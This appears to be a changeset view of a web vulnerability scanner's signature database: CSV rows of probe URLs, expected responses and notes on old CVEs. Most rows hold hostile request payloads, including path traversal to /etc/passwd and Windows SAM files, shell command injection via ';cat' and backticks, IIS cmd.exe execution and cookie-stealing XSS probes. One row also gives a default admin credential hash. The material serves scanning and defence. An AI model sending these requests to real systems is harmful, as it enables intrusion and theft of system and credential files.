"003205","474","7","/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3210 "003206","474","7","/Sites/Samples/Knowledge/Push/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3211 "003207","474","7","/Sites/Samples/Knowledge/Search/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3212 "003208","474","7","/SiteServer/Publishing/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3213 3213 "003209","17671","37","/siteserver/publishing/viewcode.asp?source=/default.asp","GET","200","","","","","May be able to view source code using Site Server vulnerability.","","" 3214 3214 "003210","4775","7","/shoutbox.php?conf=../../../../../../../etc/passwd","GET","root:","","","","","Webfroot Shoutbox 2.32 and below allows any file to be read from the system.","","" … … 3266 3266 "003262","5108","4","/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>","GET","<script>alert(document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3267 3267 "003263","514","8","/isapi/tstisapi.dll","GET","Pi3web","","","","","The test tstisapi.dll is available and can allow attackers to execute commands remotely.","","" 3268 "003264","524","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. C AN-2001-0320","",""3269 "003265","524","7","@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. C AN-2001-0320","",""3268 "003264","524","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","","" 3269 "003265","524","7","@NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","","" 3270 3270 "003266","5324","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf","GET","SET CLIENT FILE","","","","","Default scripts can allow arbitrary access to the host.","","" 3271 3271 "003267","5325","7","/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf","GET","Source for file","","","","","Novell web server allows any file on the system to viewed through the viewcode.jsp file","","" 3272 "003268","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","200","","","","","ustorekeeper will display arbitrary files. C AN-2001-0466","",""3273 "003269","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely. C AN-2001-0466.","",""3272 "003268","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","200","","","","","ustorekeeper will display arbitrary files. CVE-2001-0466","","" 3273 "003269","534","7","@CGIDIRSustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely. CVE-2001-0466.","","" 3274 3274 "003270","539","d","/catinfo","GET","200","","","","","May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.","","" 3275 3275 "003271","5407","a","/soap/servlet/soaprouter","GET","200","","","","","Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.","","" … … 3296 3296 "003292","554","7","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","","" 3297 3297 "003293","554","7","@CGIDIRSa1stats/a1disp4.cgi?../../../../../../../etc/passwd","GET","root:","","","","","Remote file retrieval.","","" 3298 "003294","556","8","/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3299 "003295","556","8","/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3300 "003296","556","8","/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3301 "003297","556","8","/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3302 "003298","556","8","/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3303 "003299","556","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3304 "003300","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3305 "003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","[Version]","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3306 "003302","556","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. C AN-2001-0333. BID-2708.","",""3298 "003294","556","8","/certsrv/..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3299 "003295","556","8","/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3300 "003296","556","8","/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3301 "003297","556","8","/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3302 "003298","556","8","/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3303 "003299","556","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3304 "003300","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3305 "003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","[Version]","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3306 "003302","556","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug, which allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3307 3307 "003303","562","3","/server-info","GET","200","Server Information","","","","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","","" 3308 3308 "003304","5689","4","@CGIDIRSnamazu.cgi","GET","200","","","","","Namazu search engine found. Vulnerable to CSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02.","","" … … 3320 3320 "003316","596","3","/dcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" 3321 3321 "003317","596","3","/dcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" 3322 "003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. C AN-2001-0985.","",""3323 "003319","641","7","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows reading of remote files. C AN-2001-1019.","",""3322 "003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. CVE-2001-0985.","","" 3323 "003319","641","7","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows reading of remote files. CVE-2001-1019.","","" 3324 3324 "003320","644","3","/.FBCIndex","GET","Bud2","","","","","This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html","","" 3325 "003321","645","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution. C AN-2001-0992.","",""3326 "003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\/perl","","","","","This CGI allows attackers to execute commands on the remote server. C AN-2001-1014.","",""3325 "003321","645","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution. CVE-2001-0992.","","" 3326 "003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\/perl","","","","","This CGI allows attackers to execute commands on the remote server. CVE-2001-1014.","","" 3327 3327 "003323","6659","4","/JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--","GET","<script>alert('Vulnerable')</script>","","","","","MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3328 3328 "003324","6661","7","@CGIDIRSion-p.exe?page=c:\winnt\repair\sam","GET","200","","","","","Ion-P allows remote file retrieval.","","" … … 3344 3344 "003340","6698","8","@CGIDIRSclassifieds/classifieds.cgi","GET","200","","","","","Mike's Classifieds CGI contained a bug allows arbitrary command execution on the server (untested), see http://freshmeat.net/projects/myclassifieds/","","" 3345 3345 "003341","6699","8","@CGIDIRScalendar/index.cgi","GET","200","","","","","Mike's Calendar CGI contained a bug which allowed arbitrary command execution (version 1.4), see http://freshmeat.net/projects/mycalendar/","","" 3346 "003342","670","3","/stronghold-info","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. C AN-2001-0868.","",""3347 "003343","670","3","/stronghold-status","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. C AN-2001-0868.","",""3348 "003344","674","3","/blah-whatever.jsp","GET","JSP file \"","","","","","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. C AN-2000-0759.","",""3349 "003345","677","7","/gallery/index.php?include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery allows files to be read remotely. C AN-2001-0900.","",""3350 "003346","677","7","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery Addon for PhpNuke allows files to be read remotely. C AN-2001-0900.","",""3346 "003342","670","3","/stronghold-info","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. CVE-2001-0868.","","" 3347 "003343","670","3","/stronghold-status","GET","200","","","","","Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. CVE-2001-0868.","","" 3348 "003344","674","3","/blah-whatever.jsp","GET","JSP file \"","","","","","The Apache Tomcat 3.1 server reveals the web root path when requesting a non-existent JSP file. CVE-2000-0759.","","" 3349 "003345","677","7","/gallery/index.php?include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery allows files to be read remotely. CVE-2001-0900.","","" 3350 "003346","677","7","/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd","GET","root:","","","","","Gallery Addon for PhpNuke allows files to be read remotely. CVE-2001-0900.","","" 3351 3351 "003347","684","4","@CGIDIRS../../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" 3352 3352 "003348","684","4","@CGIDIRSNUL/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" 3353 3353 "003349","684","4","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" 3354 3354 "003350","694","7","/phprocketaddin/?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","","" 3355 "003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), C AN-2001-1199, CA-2000-02.","",""3355 "003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), CVE-2001-1199, CA-2000-02.","","" 3356 3356 "003352","7","6","/iissamples/exair/howitworks/Code.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","","" 3357 "003353","7","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be removed, it may allow a DoS against the server. C AN-1999-0738. MS99-013. CVE-1999-0449. BID-193.","",""3358 "003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows attackers to read arbitrary files on the host. C AN-1999-0736. MS99-013.","",""3357 "003353","7","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be removed, it may allow a DoS against the server. CVE-1999-0738. MS99-013. CVE-1999-0449. BID-193.","","" 3358 "003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows attackers to read arbitrary files on the host. CVE-1999-0736. MS99-013.","","" 3359 3359 "003355","701","4","/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3360 3360 "003356","701","4","/pls/help/<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" … … 3374 3374 "003370","724","8","/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'","","" 3375 3375 "003371","724","8","/ans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","","" 3376 "003372","761","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. C AN-2002-0495.","",""3376 "003372","761","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch (http://www.cgiscript.net/) has a major flaw which allows perl to be executed remotely. Upgrade to a version higher than 2.3. CVE-2002-0495.","","" 3377 3377 "003373","768","3","/?\"><script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable')</script>","","","","","IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09","","" 3378 3378 "003374","3341","3","/JUNK(10)abcd.html","GET","+ displayresult +","","","","","The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.","","" … … 3380 3380 "003376","783","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa","GET","OBJECT RUNAT=Server","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS can reveal source code. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","","" 3381 3381 "003377","784","36","/servlet/com.newatlanta.servletexec.JSP10Servlet/","GET","The file was not found","","","","","ServletExec 4.1 ISAPI Java Servlet/JSP Engine for IIS discloses the web root. The server may also be vulnerable to a DoS attack by requesting a long file name ending in .jsp","","" 3382 "003378","789","3","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","CodeBrws.asp can be used to determine if a file system path exists or not. C AN-1999-0739. MS99-013.","",""3383 "003379","789","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. C AN-1999-0739. MS99-013.","",""3384 "003380","789","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. C AN-1999-0739. MS99-013.","",""3385 "003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","[windows]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. C AN-2002-0661.","",""3386 "003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[fonts]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. C AN-2002-0661.","",""3382 "003378","789","3","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","CodeBrws.asp can be used to determine if a file system path exists or not. CVE-1999-0739. MS99-013.","","" 3383 "003379","789","5","/iissamples/sdk/asp/docs/codebrws.asp","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0739. MS99-013.","","" 3384 "003380","789","5","/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. CVE-1999-0739. MS99-013.","","" 3385 "003381","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini","GET","[windows]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","","" 3386 "003382","859","7","/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[fonts]","","","","","Apache allows files to be retrieved outside of the web root. Apache should be upgraded to 2.0.40 or above. CVE-2002-0661.","","" 3387 3387 "003383","96","7","/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server, it may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","","" 3388 3388 "003384","96","7","/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","[fonts]","","","","","This allows arbitrary files to be retrieved from the server, it may allow a DoS against the server. CVE-1999-0449. BID-193. MS01-033.","","" … … 6186 6186 "006184","3093","1","/includes/db.inc","GET","200","<?php","","","","Include files (.inc) should not be served in plain text.","","" 6187 6187 "006185","3093","1","/includes/sendmail.inc","GET","200","<?php","","","","Include files (.inc) should not be served in plain text.","","" 6188 "006186","","3","/wp-app.log","GET","Array","LANG","","","","Wordpress' wp-app.log may leak application/system details.","","" 6188 "006186","3092","1b","/license.txt","GET","200","","","","","License file found may identify site software.","","" 6189 "006187","3092","1b","/install.txt","GET","200","","","","","Install file found may identify site software.","","" 6190 "006188","3092","1b","/LICENSE.TXT","GET","200","","","","","License file found may identify site software.","","" 6191 "006189","3092","1b","/INSTALL.TXT","GET","200","","","","","Install file found may identify site software.","","" 6192 "006190","3092","1b","/READ_THIS_FIRST.txt","GET","Welcome to ExpressionEngine","","","","","An ExpressionEngine readme file has been found.","","" 6193 "006191","","3","/wp-app.log","GET","Array","LANG","","","","Wordpress' wp-app.log may leak application/system details.","",""
Note: See TracChangeset
for help on using the changeset viewer.